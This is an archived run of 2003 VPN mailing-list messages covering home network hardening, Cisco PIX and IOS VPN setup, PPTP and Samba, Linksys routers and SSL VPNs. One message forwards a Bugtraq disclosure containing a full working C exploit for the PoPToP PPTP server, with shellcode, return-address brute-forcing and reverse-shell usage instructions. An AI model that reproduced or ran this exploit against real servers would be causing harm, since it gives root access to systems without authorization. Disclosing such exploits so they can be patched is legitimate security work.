Message-ID: <5.2.0.9.2.20030418150541.02b3be88@mail1.excaliburfilms.com>

Scan your network for any open ports. See if anything else is running you are unaware of. Any free port scanner would work. I use LanGuard Network Scanner.

Complex passwords. 7 or more characters long. Use characters like: !@#$%^&()

Firewall. Zone Alarm. Or you can create one with that linux box. I do not know how to do that, but it has been discussed on many lists.

That would be three places I would start.

At 04:51 AM 4/18/2003 +0000, you wrote:
> Hello. Recently my network was hacked, and I'm planning on rebuilding my network (they hacked an outdated ftp server that I was unaware was running).
> I'm not sure if this should really be going on this mailing list, but I was wondering if anyone would know a decent network design that would implement great security.
>
> My home LAN currently consists of a cisco 2507 router (11.2 IOS, soon to upgrade IOS) linksys router (four port). A laptop running slackware, a box running win98, and two other boxes running linux (one box is in a serious need for an upgrade, but I don't have the funds to do it yet). My one box has three NIC cards in it as well, so it could be used as a router.
>
> I was just curious if anyone has a good idea for a network design that I could implement for maximum security. I'm currently somewhat clueless when it comes to networks. I'd also like to know where I should be placing the VPN, and whether or not I should be using PoPToP or FreeS/WAN.
>
> Any ideas or comments would be appreciated!
>
> Thanks
>
> Garrett Sinfield.

From tbird at precision-guesswork.com Fri Apr 18 21:19:47 2003
From: tbird at precision-guesswork.com (Tina Bird)
Date: Sat, 19 Apr 2003 01:19:47 +0000 (GMT)
Subject: [VPN] Exploit for PoPToP PPTP server (fwd)
Message-ID: <20030419011936.J85957-100000@sisyphus.iocaine.com>

Vulnerability for PPTP server...

---------- Forwarded message ----------
Date: Fri, 18 Apr 2003 18:27:58 +0400
From: "einstein, dhtm"
Reply-To: "einstein, dhtm"
To: "bugtraq at securityfocus.com"
Subject: Exploit for PoPToP PPTP server

hello bugtraq,

Here is an exploit for a recently discovered vulnerability in PoPToP PPTP server under Linux. Versions affected are all prior to 1.1.4-b3 and 1.1.3-20030409.
The exploit is capable of bruteforcing the RET address to find our buffer in the stack. Upon a successfull run it brings up a reverse shell with privileges of the pptpd daemon (typically root) on the victim server. Have fun, einstein, dH team einstein_dhtm at front.ru P.S. Greets to ERRor, Death and all others. Exploit code (compiles on win32): ---------------- Cut --------------------- #include #include #include #define u_int8_t char #define u_int16_t WORD #define u_int32_t DWORD char shellcode[] = "\x1a\x76\xa2\x41\x21\xf5\x1a\x43\xa2\x5a\x1a\x58\xd0\x1a\xce\x6b" "\xd0\x1a\xce\x67\xd8\x1a\xde\x6f\x1e\xde\x67\x5e\x13\xa2\x5a\x1a" "\xd6\x67\xd0\xf5\x1a\xce\x7f\xf5\x54\xd6\x7d" "\x01\x01" // port "\x54\xd6\x63" "\x01\x01\x01\x01" // ip address "\x1e\xd6\x7f\x1a\xd6\x6b\x55\xd6\x6f\x83\x1a\x43\xd0\x1e\xde\x67" "\x5e\x13\xa2\x5a\x03\x18\xce\x67\xa2\x53\xbe\x52\x6c\x6c\x6c\x5e" "\x13\xd2\xa2\x41\x12\x79\x6e\x6c\x6c\x6c\xaa\x42\xe6\x79\x78\x8b" "\xcd\x1a\xe6\x9b\xa2\x53\x1b\xd5\x94\x1a\xd6\x9f\x23\x98\x1a\x60" "\x1e\xde\x9b\x1e\xc6\x9f\x5e\x13\x7b\x70\x6c\x6c\x6c\xbc\xf1\xfa" "\xfd\xbc\xe0\xfb"; struct pptp_header { u_int16_t length; /* pptp message length incl header */ u_int16_t pptp_type; /* pptp message type */ u_int32_t magic; /* magic cookie */ u_int16_t ctrl_type; /* control message type */ u_int16_t reserved0; /* reserved */ }; #define MAX_HOSTNAME_SIZE 64 #define MAX_VENDOR_SIZE 64 #define PPTP_VERSION 0x0100 struct pptp_start_ctrl_conn_rqst { struct pptp_header header; /* pptp header */ u_int16_t version; /* pptp protocol version */ u_int16_t reserved1; /* reserved */ u_int32_t framing_cap; /* framing capabilities */ u_int32_t bearer_cap; /* bearer capabilities */ u_int16_t max_channels; /* maximum channels */ u_int16_t firmware_rev; /* firmware revision */ u_int8_t hostname[MAX_HOSTNAME_SIZE]; /* hostname */ u_int8_t vendor[MAX_VENDOR_SIZE]; /* vendor */ }; struct pptp_echo_rqst { struct pptp_header header; /* header */ u_int32_t identifier; /* value to match 
rply with rqst */ char buf[10000]; }; struct pptp_reply { struct pptp_header header; /* header */ char buf[10000]; }; /* Magic Cookie */ #define PPTP_MAGIC_COOKIE 0x1a2b3c4d /* Message types */ #define PPTP_CTRL_MESSAGE 1 /* Control Connection Management */ #define START_CTRL_CONN_RQST 1 #define START_CTRL_CONN_RPLY 2 #define STOP_CTRL_CONN_RQST 3 #define STOP_CTRL_CONN_RPLY 4 #define ECHO_RQST 5 #define ECHO_RPLY 6 // brute force values #define TOPOFSTACK 0xbfffffff #define BOTTOMOFSTACK 0xbf000000 #define STEP 50 void send_init_request(SOCKET st) { pptp_start_ctrl_conn_rqst request; request.header.magic = htonl(PPTP_MAGIC_COOKIE); request.header.pptp_type = htons(PPTP_CTRL_MESSAGE); request.header.ctrl_type = htons(START_CTRL_CONN_RQST); request.version = PPTP_VERSION; request.framing_cap = 0; request.bearer_cap = 0; request.max_channels = 1; request.firmware_rev = 0; strcpy(request.hostname,"hell"); strcpy(request.vendor,"domain HELL"); request.header.length = ntohs(sizeof(request)); send(st,(char*)&request,sizeof(request),0); } void send_ping_overflow(SOCKET st,DWORD ret,char* hostname,short port) { pptp_echo_rqst ping; ping.header.magic = htonl(PPTP_MAGIC_COOKIE); ping.header.pptp_type = htons(PPTP_CTRL_MESSAGE); ping.header.ctrl_type = htons(ECHO_RQST); ping.identifier = 111; ping.header.length = ntohs(1); strcpy(ping.buf,""); int buflen = 500; for (int i=0;i [] [] []\n\n",argv[0]); printf(" is the ip address or hostname of the PoPToP server\n"); printf(" you want to attack. Port 1723 is used for connection\n"); printf(" and - specify an ip address to which\n"); printf(" a connection is possible to port and set up a\n"); printf(" netcat listener. You'll get a reverse shell.\n"); printf(" is a delay between stack bruteforce attemts, in milliseconds\n"); printf(" If you only pass a single parameter, the program will check\n"); printf(" whether remote server is vulnerable or not. 
Otherwise it will\n"); printf(" perform a ret bruteforce.\n"); printf("usage examples:\n"); printf(" %s 192.168.1.2 192.168.1.1 5555\n",argv[0]); printf(" attack 192.168.1.2 and get a reverse shell on port 5555\n"); printf(" %s 127.0.0.1 127.0.0.1 6666 100\n",argv[0]); printf(" attack a locally running pptpd with a timeout of 100 ms\n"); printf(" and get a shell on port 6666.\n"); printf(" %s 192.168.1.56\n",argv[0]); printf(" check if the PoPToP server on 192.168.1.56 is vulnerable.\n"); return 0; } int timeout = 500; if (argc >= 5) timeout = atoi(argv[4]); // init winsock WORD version=0x0101; WSADATA data; WSAStartup(version,&data); DWORD ret; if (argc == 2) { if (!connect_server(argv[1])) return 1; printf("\nChecking if the server is vulnerable..\n"); printf("(if it is you have to wait 65 seconds)..\n"); send_init_request(st); ret = 0x01010101; int bytes; pptp_reply reply; //header length bytes = recv(st,(char*)&reply,2,0); bytes = ntohs(reply.header.length); bytes = recv(st,(char*)&reply+2,bytes-2,0); int j = htons(reply.header.ctrl_type); send_ping_overflow(st,ret,"0.0.0.0",0); //header length bytes = recv(st,(char*)&reply,2,0); printf("PoPToP server is "); if (bytes != SOCKET_ERROR) printf("vulnerable!\n"); else printf("not vulnerable\n"); closesocket(st); return 1; } printf("[!] 
Attempting bruteforce against %s\n",argv[1]); printf("interrupt when you get a shell to %s on port %d...\n\n",argv[2],atoi(argv[3])); int checked = 0; for (ret = TOPOFSTACK; ret >=BOTTOMOFSTACK; ret -= STEP) { printf("[*] "); if (!connect_server(argv[1])) return 1; printf("[ret=0x%x]..",ret); printf("sending payload.."); // initial packet send_init_request(st); //a real overflowing ping packet send_ping_overflow(st,ret,argv[2],atoi(argv[3])); closesocket(st); Sleep(timeout); printf("done\n"); } return 0; }

From losttoy2000 at yahoo.co.uk Sat Apr 19 02:01:48 2003
From: losttoy2000 at yahoo.co.uk (Siddhartha Jain)
Date: Sat, 19 Apr 2003 07:01:48 +0100 (BST)
Subject: [VPN] Network Design for security.
In-Reply-To:
Message-ID: <20030419060148.89613.qmail@web12706.mail.yahoo.com>

Hi Garrett,

Without going in too much detail, there are a few things you need to do:

1. Put a firewall (an old pentium with openbsd is an excellent choice or buy a PIX 501) on your internet connection and allow access to only those ports/IPs that absolutely must be accessed from outside world. If your network is only accessed from fixed networks then define "from" IP address also. If you don't have any public access servers then you don't need to allow any incoming connections.

2. Check all the services your servers are running and ensure they are bare minimum as required. Audit each service for security vulnerabilities.

3. Occasionally, dialup from one of the computers that are not your home network and scan your IP address range for list of open ports.

4. Use a good tool like Nessus (www.nessus.org) for scanning your applications for vulnerabilities.

5. Update apps like IE which can allow a malicious web site to take over your PC.

IMHO, this should take care of 95% of the crackers who are nothing but script kiddies. The chances of a real hacker hitting your network are very low unless you happen to be Bush, Chirac or some super secret intelligence service.
:-) As an after-thought, you may consider employing me ;-)

Regards,

Siddhartha
CISSP

--- Garrett Sinfield wrote:
> Hello. Recently my network was hacked, and I'm planning on rebuilding my network (they hacked an outdated ftp server that I was unaware was running). I'm not sure if this should really be going on this mailing list, but I was wondering if anyone would know a decent network design that would implement great security.
>
> My home LAN currently consists of a cisco 2507 router (11.2 IOS, soon to upgrade IOS) linksys router (four port). A laptop running slackware, a box running win98, and two other boxes running linux (one box is in a serious need for an upgrade, but I don't have the funds to do it yet). My one box has three NIC cards in it as well, so it could be used as a router.
>
> I was just curious if anyone has a good idea for a network design that I could implement for maximum security. I'm currently somewhat clueless when it comes to networks. I'd also like to know where I should be placing the VPN, and whether or not I should be using PoPToP or FreeS/WAN.
>
> Any ideas or comments would be appreciated!
>
> Thanks
>
> Garrett Sinfield.

From jmondaca at entelsa.entelnet.bo Thu Apr 24 12:20:16 2003
From: jmondaca at entelsa.entelnet.bo (jmondaca at entelsa.entelnet.bo)
Date: Thu, 24 Apr 2003 12:20:16 -0400
Subject: [VPN] Complete VPN access to all PIX interfaces
Message-ID:

I have a PIX 6.2 with 6 interfaces and VPN client 3.0.
I have configured the firewall to permit a VPN connection using the following conf:

access-list 100 permit ip x.x.x.x 255.255.255.0 y.y.y.y 255.255.255.0
nat (dmz2) 0 access-list 100
sysopt connection permit-ipsec
crypto ipsec transform-set myset esp-3des esp-md5-hmac
crypto dynamic-map dynmap 30 set transform-set myset
crypto map newmap 20 ipsec-isakmp dynamic dynmap
crypto map newmap interface outside
* and the configuration of the vpngroup and isakmp

The problem is that I only want the vpn client to access my x.x.x.x network in dmz2, but the VPN client can access all the computers in the internal, dmz1, dmz3, etc (all the interfaces).

Thanks in advance.

_______________________________________
Jorge Mondaca
Gerencia Seguridad Corporativa
(591) 2-2313030 ext 2021
(591) 72029832

From mferguson at pcsystems-okc.com Thu Apr 24 18:17:13 2003
From: mferguson at pcsystems-okc.com (Marc Ferguson)
Date: Thu, 24 Apr 2003 17:17:13 -0500
Subject: [VPN] Connecting a Cisco VPN client to a Symantec/Raptor appliance
Message-ID: <2FC8B6E691F86149843719FD4BFDD5BA21C240@pcsmail.pcs.com>

Has anyone had any luck using the Cisco client to connect to a Symantec/Axent Raptor box? I have external business partners that are required to run the Cisco VPN client that I need to give access to network resources through my Symantec Gateway Security Appliance and the two clients will not reside on the same PC. Symantec support can only tell me that it should work.

Thanks.

Marc Ferguson
Sales Manager
Ridco Inc. DBA PC Systems
3908 N. Tulsa Ave.
Oklahoma City, OK. 73112
(405)495-6111
(405)516-2208
mferguson at pcsystems-okc.com
From scottn at s2s.ltd.uk Fri Apr 25 05:25:36 2003
From: scottn at s2s.ltd.uk (Scott Nursten)
Date: Fri, 25 Apr 2003 10:25:36 +0100
Subject: [VPN] Complete VPN access to all PIX interfaces
In-Reply-To:
Message-ID:

Jorge,

This is easily solved. One solution is, on your other interfaces, do the following:

access-list dmz3 deny ip z.z.z.z 255.255.255.0 y.y.y.y 255.255.255.0
access-list dmz3 permit ip any any
access-group dmz3 in interface dmz3

Another solution would be to match interesting traffic on your dynamic-map:

access-list DYNCRYPTO permit ip x.x.x.x 255.255.255.0 y.y.y.y 255.255.255.0
crypto dynamic-map dynmap 30 match address DYNCRYPTO

It is a good idea to have a separate acl for this as you may want to have disparate nat 0 and crypto acl's.

Option one blocks traffic going to y.y.y.y _before_ it enters this pix - ie. as it hits the interface. Option two blocks traffic _before_ it enters the tunnel, ie _after_ it's "entered" the firewall ASA.

Hope this helps.

--
Scott Nursten
-------------------
S2S Consultants
http://s2s.ltd.uk
scottn at s2s.ltd.uk
Tel: 0870 350 4525
Fax: 0870 350 4526
-------------------

From carnt at intellissence.com Fri Apr 25 20:31:46 2003
From: carnt at intellissence.com (Carlos Arnt)
Date: Sat, 26 Apr 2003 09:31:46 +0900
Subject: [VPN] PPTP and Samba Wins.
Message-ID: <002901c30b8b$38ba77d0$0901a8c0@carlosa>

Please, I really need a lot of help here, or maybe I will be fired :(

I have 2 points connected over PPTPd (using linux redhat 7.3). One is with a server (pptpd), the other with the client (pptp). On the server side I have the network 192.168.10.x, on the client side I have the network 192.168.33.x. Both have Windows 98 computers connected. After the connection is made, the machines on both networks can ping and use applications like "VNC" etc from each other and also use netmeeting etc. Full operations.
Now my boss wants to use netbios to call each machine and also see the different workgroups in his Network Neighborhood. Like this: opening the Network Neighborhood he will see Workgroup A and B; selecting one or the other he can see the machines from both networks inside the A or B workgroups.

For that I use Samba with its Wins option. In the network 192.168.10.x I put the Samba with wins in server mode. In the other, 192.168.33.x, I just point the other Samba to the wins server in the 192.168.10.x network, using it like a proxy.

Well, I can see both workgroups in my Network Neighborhood, but when I click on the workgroup I can't see the machines from the other network, just mine :(. What's happening? I've tried everything and nothing works :"(

On the client side I use iptables, on the server side ipchains. But I think that if I'm under the VPN my ports are all open to the traffic and the packets pass.

Can anyone help here?

Thanks !!

Carlos.

From cipherbk at yahoo.com Sun Apr 27 00:30:11 2003
From: cipherbk at yahoo.com (cipherbk)
Date: Sat, 26 Apr 2003 21:30:11 -0700 (PDT)
Subject: [VPN] Network Design for security.
In-Reply-To:
Message-ID: <20030427043011.69997.qmail@web12804.mail.yahoo.com>

I've had great success setting up a box running OpenBSD or FreeBSD, configuring it as a firewall running IPF(ilter) and disabling all non-essential services (much easier than with linux, btw). This firewall box also handles NAT functionality for an internal network. Recently, OpenBSD's PF (packet filter) has been made available for FreeBSD 5.0, and is a step above IPF.

If the Cisco is your gateway to the Internet, I'd configure the network in this manner:

[2507] -- [BSD firewall] -- [Linksys] -- [Internal LAN nodes]

You'll need two NICs for the firewall, and a third if you want to run a DMZ, i.e.
if you want to run a server outside of your LAN; although this significantly increases the complexity of the firewall configuration. An alternative is to use the NAT capability to redirect ports to a server in your LAN, which provides better security overall and is easier to implement. This would allow you to put the VPN gateway of your choice behind the firewall. You can also configure the firewall to be a VPN gateway as well. You can use that old box of moderate capability just fine, no need to upgrade it. That is, unless you plan on running the VPN on it; in that case, you should beef it up a bit. All the more reason to run the VPN on a linux (or BSD or even Windows) box behind the firewall and just redirect a port to it. After you get your firewall configured (yes, you'll have to read documentation and learn how to make and tweak rulesets), you should install Nmap to scan it for open ports. You can go to http://crypto.yashy.com and scroll to the bottom and there's a self-scan option that uses Nmap to scan your firewall. If you were strictly a Windows user, ZoneAlarm would be the most convenient solution. But, since you mentioned that you run linux, dedicating an old box for firewall duty running OpenBSD or FreeBSD would be the most secure solution without spending any cash on expensive hardware firewalls, much more flexible and just as (if not more) secure. If you want to read up on BSD beforehand, check out http://bsdvault.net which has lots of links and tutorials... You should also look at the NSA guide for securing Cisco routers and harden it up... It's long, but has good info. Google for it. Good luck. --- Garrett Sinfield wrote: > Hello. Recently my network was hacked, and I'm planning on rebuilding > my > network (they hacked an outdated ftp server that I was unaware was > running). I'm not sure if this should really be going on this mailing > list, but I was wondering if anyone would know a decent network > design > that would implement great security. 
>
> My home LAN currently consists of a cisco 2507 router (11.2 IOS, soon to upgrade IOS) linksys router (four port). A laptop running slackware, a box running win98, and two other boxes running linux (one box is in a serious need for an upgrade, but I don't have the funds to do it yet). My one box has three NIC cards in it as well, so it could be used as a router.
>
> I was just curious if anyone has a good idea for a network design that I could implement for maximum security. I'm currently somewhat clueless when it comes to networks. I'd also like to know where I should be placing the VPN, and whether or not I should be using PoPToP or FreeS/WAN.
>
> Any ideas or comments would be appreciated!
>
> Thanks
>
> Garrett Sinfield.

From dmickovic at verio.net Sun Apr 27 12:13:04 2003
From: dmickovic at verio.net (Dragan Mickovic)
Date: Sun, 27 Apr 2003 12:13:04 -0400
Subject: [VPN] vpn between SSH Sentinel and Cisco 2600
Message-ID: <20030427121304.A75911@verio.net>

I'm trying to setup VPN between a unit with ssh sentinel and cisco 2600, but for some reason ssh sentinel doesn't send the xauth information (username/password).
I've made sure it is correctly checked and has the correct info entered (user/pass), but still get the following:

---------------------------------------------------------
2d20h: ISAKMP (0:0): received packet from (N) NEW SA
2d20h: ISAKMP: local port 500, remote port 500
2d20h: ISAKMP (0:1): Setting client config settings 8273CF74
2d20h: ISAKMP (0:1): (Re)Setting client xauth list userlogin and state
2d20h: ISAKMP: Created a peer node for
2d20h: ISAKMP: Locking struct 8273CF74 from crypto_ikmp_config_initialize_sa
2d20h: ISAKMP (0:1): processing SA payload. message ID = 0
2d20h: ISAKMP (0:1): found peer pre-shared key matching
2d20h: ISAKMP (0:1): Checking ISAKMP transform 0 against priority 1 policy
2d20h: ISAKMP: encryption DES-CBC
2d20h: ISAKMP: hash MD5
2d20h: ISAKMP: auth pre-share
2d20h: ISAKMP: default group 2
2d20h: ISAKMP: life type in seconds
2d20h: ISAKMP: life duration (basic) of 14400
2d20h: ISAKMP (0:1): atts are acceptable. Next payload is 0
2d20h: ISAKMP (0:1): processing vendor id payload
2d20h: ISAKMP (0:1): processing vendor id payload
2d20h: ISAKMP (0:1): processing vendor id payload
2d20h: ISAKMP (0:1): processing vendor id payload
2d20h: ISAKMP (0:1): SA is doing pre-shared key authentication using id type ID_IPV4_ADDR
2d20h: ISAKMP (0:1): sending packet to (R) MM_SA_SETUP
2d20h: ISAKMP (0:1): received packet from (R) MM_SA_SETUP
2d20h: ISAKMP (0:1): processing KE payload. message ID = 0
2d20h: ISAKMP (0:1): processing NONCE payload. message ID = 0
2d20h: ISAKMP (0:1): found peer pre-shared key matching
2d20h: ISAKMP (0:1): SKEYID state generated
2d20h: ISAKMP (0:1): sending packet to (R) MM_KEY_EXCH
2d20h: ISAKMP (0:1): received packet from (R) MM_KEY_EXCH
2d20h: ISAKMP (0:1): processing ID payload. message ID = 0
2d20h: ISAKMP (0:1): processing HASH payload.
message ID = 0
2d20h: ISAKMP (0:1): processing NOTIFY INITIAL_CONTACT protocol 1 spi 0, message ID = 0, sa = 8273C00C
2d20h: ISAKMP (0:1): SA has been authenticated with
2d20h: ISAKMP (1): ID payload
        next-payload : 8
        type         : 1
        protocol     : 17
        port         : 500
        length       : 8
2d20h: ISAKMP (1): Total payload length: 12
2d20h: ISAKMP (0:1): sending packet to (R) CONF_XAUTH
2d20h: ISAKMP (0:1): received packet from (R) CONF_XAUTH
2d20h: ISAKMP (0:1): (Re)Setting client xauth list userlogin and state
2d20h: ISAKMP (0:1): Need XAUTH
2d20h: ISAKMP: got callback 1
2d20h: ISAKMP (0:1): initiating peer config to . ID = -1240066450
2d20h: ISAKMP (0:1): sending packet to (R) CONF_XAUTH
2d20h: ISAKMP (0:1): received packet from (R) CONF_XAUTH
2d20h: ISAKMP (0:1): processing transaction payload from . message ID = -1240066450
2d20h: ISAKMP: configuration header expected in config message
2d20h: ISAKMP (0:1): deleting node -1240066450 error FALSE reason ""
2d20h: ISAKMP (0:1): peer does not do paranoid keepalives.
2d20h: ISAKMP (0:1): deleting SA reason "Needed xauth" state (R) CONF_XAUTH (peer ) input queue 0
2d20h: ISAKMP: Unlocking struct 8273CF74 on return of attributes
2d20h: ISAKMP (0:1): deleting node 938348426 error TRUE reason "Needed xauth"
2d20h: ISAKMP (0:1): peer does not do paranoid keepalives.
2d20h: ISAKMP (0:1): received packet from (R) MM_NO_STATE
2d20h: ISAKMP (0:1): received packet from (R) MM_NO_STATE
----------------------------------------------------------------

and here is the router config:

----------------------------------------------------------------
aaa new-model
aaa authentication login userlogin group tacacs+
aaa authorization network grouplogin group tacacs+
!
ip subnet-zero
!
!
ip audit notify log
ip audit po max-events 100
!
crypto isakmp policy 1
 hash md5
 authentication pre-share
 group 2
 lifetime 14400
crypto isakmp key cisco address 0.0.0.0 0.0.0.0
crypto isakmp client configuration address-pool local REMOTE
!
!
crypto ipsec transform-set ONE esp-des esp-md5-hmac
!
crypto dynamic-map MAP 10
 set transform-set ONE
!
!
crypto map INTMAP client authentication list userlogin
crypto map INTMAP isakmp authorization list grouplogin
crypto map INTMAP client configuration address initiate
crypto map INTMAP client configuration address respond
crypto map INTMAP 1 ipsec-isakmp dynamic MAP discover
!
interface Loopback1
 ip address 192.168.2.1 255.255.255.255
!
interface Ethernet0/0
 ip address 255.255.255.0
 ip nat outside
 half-duplex
 crypto map INTMAP
!
interface Serial0/0
 no ip address
 shutdown
!
interface Ethernet0/1
 ip address 192.168.1.101 255.255.255.0
 ip nat inside
 half-duplex
!
interface Serial0/1
 no ip address
 shutdown
!
ip local pool REMOTE 192.168.2.50 192.168.2.100
ip nat inside source list 20 interface Ethernet0/0 overload
-------------------------------------

Is it something with the router config or the SSH Sentinel setting?

thanks
dragan

--
Dragan Mickovic
UNIX Systems Administrator
NTT/Verio x.4012

From justinp at adapt.iinet.net.au Mon Apr 28 05:57:57 2003
From: justinp at adapt.iinet.net.au (Justin Pember)
Date: Mon, 28 Apr 2003 17:57:57 +0800
Subject: [VPN] Linksys BEFVP41
Message-ID: <000001c30d6c$a5614430$6400a8c0@uptown>

Any input regarding this situation would be greatly appreciated. :-)

I have two sites, one with a DSL connection with a static IP address, the other with a microwave connection also with a static public IP. A VPN needs to be set up to provide LAN to LAN communication between the sites, as well as allow several remote users to connect to one of the LANs via a VPN.

Would the Linksys BEFVP41 be suitable for this situation with the following considerations?

1) A server on the LAN that is on the microwave connection needs to provide web and mail services to the internet. Is it easy to set up port forwarding to the server so it can still provide these public services from inside the private network with the BEFVP41?
The site only has the single public IP address.

2) Several more sites will eventually be added that will also need a LAN to LAN connection. The BEFVP41 is capable of 70 VPN tunnels, but can it do multiple end to end type tunnels between LANs and route any internal traffic to any other point on one of the other LANs?

3) The BEFVP41 is advertised for cable or DSL connections. Will there be any problems using it on the microwave connection at one of the sites? The microwave connection is a reliable connection to the internet and uses a standard Ethernet connection.

4) Does the BEFVP41 only provide a NAT firewall or does it also provide an SPI firewall like the similar BEFSX41?

5) Is this model easy to set up with multiple VPN tunnels connecting the LANs together, and is it able to reliably re-establish any dropped connections without assistance?

Thanks in advance for any help!

From pjacob at ftmc.com Mon Apr 28 15:13:35 2003
From: pjacob at ftmc.com (Pete Jacob)
Date: 28 Apr 2003 15:13:35 -0400
Subject: [VPN] Linksys BEFVP41
In-Reply-To: <000001c30d6c$a5614430$6400a8c0@uptown>
References: <000001c30d6c$a5614430$6400a8c0@uptown>
Message-ID: <1051557215.5488.15.camel@Pete.Ftmc.Com>

On Mon, 2003-04-28 at 05:57, Justin Pember wrote:
> Any input regarding this situation would be greatly appreciated. :-)
>
> I have two sites, one with a DSL connection with a static IP address,
> the other with a microwave connection also with a static public IP. A
> VPN needs to be set up to provide LAN to LAN communication between the
> sites, as well as allow several remote users to connect to one of the
> LANs via a VPN.
> Would the Linksys BEFVP41 be suitable for this situation with the
> following considerations?

The BEFVP41 can not be the endpoint of an IPsec tunnel... it is a client-less VPN start point...
> 1) A server on the LAN that is on the microwave connection needs to
> provide web and mail services to the internet. Is it easy to set up
> port forwarding to the server so it can still provide these public
> services from inside the private network with the BEFVP41? The site
> only has the single public IP address.

Unless you have very high budget restraints.. I would not use the BEFVP41 for something like that... it is very inexpensive, but is very low end... there is no way to actually save your configuration... Linksys support is not real good... if you have a problem, the suggested fix is to press the reset button and start over.

> 2) Several more sites will eventually be added that will also need a
> LAN to LAN connection. The BEFVP41 is capable of 70 VPN tunnels, but
> can it do multiple end to end type tunnels between LANs and route any
> internal traffic to any other point on one of the other LANs?

Not really, you need a higher end router/firewall/VPN server at your main site... I suggest looking at some of the Netscreen products...

> 3) The BEFVP41 is advertised for cable or DSL connections. Will there
> be any problems using it on the microwave connection at one of the
> sites? The microwave connection is a reliable connection to the
> internet and uses a standard Ethernet connection.

No, I use it for this as well for some Breezecom DS.11 units... I believe the port is just a 10 meg port.

> 4) Does the BEFVP41 only provide a NAT firewall or does it also
> provide an SPI firewall like the similar BEFSX41?

No, it is a very basic firewall, and some of the documentation says that you should even run something like Zone Alarm as well... (yuck) If you're getting hacked there is no screen or output that will let you know of any attempted hacks or port scans or anything.

> 5) Is this model easy to set up with multiple VPN tunnels connecting
> the LANs together, and is it able to reliably re-establish any
> dropped connections without assistance?
I have 7 remote offices using BEFVP41's that connect into a Netscreen appliance, over an 802.11b wireless network... it works pretty well... sometimes if you connect to the WAN interface for configuration the BEFVP41's lock up, and we have to physically power them off... the DHCP in the units doesn't work well... I would invest higher on the head end, and lower on the client site... (just my opinion) you can get some Netscreen devices pretty reasonable with support... I would say that they are way above a Linksys, D-Link, or Kmart brand, without getting into something like a Cisco PIX.

> Thanks in advance for any help!

Pete Jacob
Fisher-Titus Medical Center

From vincent.bartsch at cubic.com Mon Apr 28 22:15:08 2003
From: vincent.bartsch at cubic.com (Bartsch, Vincent)
Date: Mon, 28 Apr 2003 19:15:08 -0700
Subject: [VPN] SSL VPN

I am researching everything about SSL and its use as a VPN solution. I am aware of some of its limitations but I was wondering has anyone tried this: allowed an SSL connection to a web server that lets the user open a connection to a terminal server. Or can it be configured to connect to a terminal server via an SSL connection directly? Has anyone tried this, were they successful?

Again, I am just researching this thought. Any word back on this would be most appreciated, thanks.

Vincent

From tbird at precision-guesswork.com Mon Apr 28 22:36:04 2003
From: tbird at precision-guesswork.com (Tina Bird)
Date: Tue, 29 Apr 2003 02:36:04 +0000 (GMT)
Subject: [VPN] SSL VPN
Message-ID: <20030429023323.S53613-100000@sisyphus.iocaine.com>

Hi Vincent -- I don't have anything that will be immediately useful, but we had a bit of a discussion about SSL-based VPNs. The responses to my original posting included a lot of experience the writers had had, so it might be very useful for you.

http://vpn.shmoo.com -- click on SSL VPNs & Other Misc

cheers -- tbird

--
It's not the size of the key, it's the implementation of the algorithm...
    -- Natasha Smith

http://www.shmoo.com/~tbird
Log Analysis     http://www.loganalysis.org
VPN              http://vpn.shmoo.com
Security Alerts  http://securecomputing.stanford.edu/alert.html

From alex at cipherica.com Mon Apr 28 22:58:54 2003
From: alex at cipherica.com (Alex Pankratov)
Date: Mon, 28 Apr 2003 19:58:54 -0700
Subject: [VPN] SSL VPN
Message-ID: <3EADEA6E.5070108@cipherica.com>

Vincent,

coincidentally I was looking at securing TS traffic just last week, so as an alternative you may want to look at MS's own article: http://support.microsoft.com/?kbid=315055, "HOW TO: Use IPSec Policy to Secure Terminal Services Communications in Windows 2000". This is not much, it does not talk about how to set up authentication or about NAT traversal, etc, etc.
Amongst SSL-based solutions, http://stunnel.org is the first thing that comes to mind. I don't see any reason why it should not work, so I'd try it first.

On the more general topic, I recently wrote a small article about a very simple aspect of TCP-based VPNs which can seriously undermine the robustness of the former. The issue is worth considering depending on your deployment scenario.

http://www.cipherica.com/papers/tcp-vpn-dos.pdf

cheers,
alex.

From shannong at texas.net Mon Apr 28 23:22:51 2003
From: shannong at texas.net (shannong)
Date: Mon, 28 Apr 2003 22:22:51 -0500
Subject: [VPN] Complete VPN access to all PIX interfaces
Message-ID: <001401c30dfe$a0c6e730$0101a8c0@ASTEROID>

You need to remove the command [sysopt connection permit-ipsec]. This tells the Pix to bypass all ACLs for traffic incoming from VPN tunnels. Instead, use an ACL on the interface where the VPN is terminated (outside in your case) to allow exactly the traffic you want. Keep in mind the command is global, and you'll need to define ACEs that allow all desired VPN traffic for all tunnels.

-Shannon

-----Original Message-----
From: vpn-admin at lists.shmoo.com [mailto:vpn-admin at lists.shmoo.com] On Behalf Of jmondaca at entelsa.entelnet.bo
Sent: Thursday, April 24, 2003 11:20 AM
To: vpn at lists.shmoo.com; vpn-admin at lists.shmoo.com
Subject: [VPN] Complete VPN access to all PIX interfaces

I have a PIX 6.2 with 6 interfaces and VPN client 3.0.
I have configured the firewall to permit a VPN connection using the following conf:

access-list 100 permit ip x.x.x.x 255.255.255.0 y.y.y.y 255.255.255.0
nat (dmz2) 0 access-list 100
sysopt connection permit-ipsec
crypto ipsec transform-set myset esp-3des esp-md5-hmac
crypto dynamic-map dynmap 30 set transform-set myset
crypto map newmap 20 ipsec-isakmp dynamic dynmap
crypto map newmap interface outside

* and the configuration of the vpngroup and isakmp

The problem is that I only want the VPN client to access my x.x.x.x network in dmz2, but the VPN client can access all the computers in the internal, dmz1, dmz3, etc. (all the interfaces).

Thanks in advance.

_______________________________________
Jorge Mondaca
Corporate Security Management
(591) 2-2313030 ext 2021
(591) 72029832

_______________________________________________
VPN mailing list
VPN at lists.shmoo.com
http://lists.shmoo.com/mailman/listinfo/vpn

From shannong at texas.net Mon Apr 28 23:28:22 2003
From: shannong at texas.net (shannong)
Date: Mon, 28 Apr 2003 22:28:22 -0500
Subject: [VPN] SSL VPN
Message-ID: <001501c30dff$663f4570$0101a8c0@ASTEROID>

I've done quite a bit of testing on this. You can move TS to a new port (443/80), but then that's not really a proxy. You can use proxies for RDP and have the traffic tunneled over 443. I recommend this approach so that only authenticated users have access to the RDP/Citrix server rather than the Internet at large.

However, I recommend against using SSL based VPNs for network layer access as they ignore client side security. Do you really want users connecting from random PCs on the Internet that already have Trojans/backdoors installed? Then that hacked PC gives some other party full access to your network? Perhaps from a coffee bar where they forget to log off and walk away, giving an entire city access to your internal network?
